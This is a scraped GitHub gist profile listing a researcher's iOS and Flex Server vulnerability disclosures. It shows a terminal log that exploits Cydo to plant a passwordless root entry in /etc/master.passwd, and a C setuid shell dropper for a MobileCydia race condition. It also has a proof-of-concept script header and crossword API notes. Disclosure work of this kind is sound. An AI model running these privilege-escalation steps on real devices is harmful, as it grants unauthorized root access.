Skip to content

Instantly share code, notes, and snippets.

PythEch

  • Dcipher Analytics
  • Istanbul, Turkey
Block or report user

Report or block PythEch

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@PythEch
PythEch / flex_disclosure.md
Last active Jun 22, 2016
Flex Server Multiple Vulnerabilities
View flex_disclosure.md

Introduction

This gist includes multiple SQL injection vulnerabilities I found by accident in a bus while travelling. These vulnerabilities are easy to find and easy to exploit, and critical.

Background

I already have Flex legacy paid but, can't buy Flex 2 because of credit card restrictions. Anyway, I decided to give Flex 2 a shot, downloaded the beta from getdelta.co

For fun, I tried to figure out whether spoofing UDID is possible by patching Flex 2 itself. I already knew you have put so much work into DRM. I'm still unsuccessful at this.

View pwn.py
#! /usr/bin/env python
"""
PoC of AFCd Vulnerability After Pangu Jailbreak
Copyright (C) 2014 PythEch
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
@PythEch
PythEch / gist:d181bf1411057e480586
Last active Jun 22, 2016
Cydo Arbitrary Write Local Privilege Escalation
View gist:d181bf1411057e480586
Hakans-iPhone:/var/tmp mobile$ ln -s /etc/master.passwd
Hakans-iPhone:/var/tmp mobile$ mv master.passwd cydia.log
Hakans-iPhone:/var/tmp mobile$ /usr/libexec/cydia/cydo ":0:0::0:0:System Administrator:/var/root:/bin/sh"
thou shalt not pass
Hakans-iPhone:/var/tmp mobile$ su cydo
Hakans-iPhone:/var/tmp root# cat /etc/master.passwd
##
# User Database
#
# This file is the authoritative user database.
@PythEch
PythEch / poc.md
Last active Jun 22, 2016
MobileCydia.mm Race Condition LPE
View poc.md

Generic shell dropper:

#include <sys/types.h>
#include <unistd.h>

int main(int argc, char **argv, char **envp) {
    setuid(0); 
    execl("/bin/sh", "/bin/sh", 0);
    return 0;
}
View nytimes_crossword
1. Get https://nyt-games-prd.appspot.com/svc/crosswords/v3/games-hub-puzzles.json
2. Extract results.mini_puzzle.[*].puzzle_id
3. Then head over to https://nyt-games-prd.appspot.com/svc/crosswords/v6/${puzzle_id}.json
4. Parse the data.
You can’t perform that action at this time.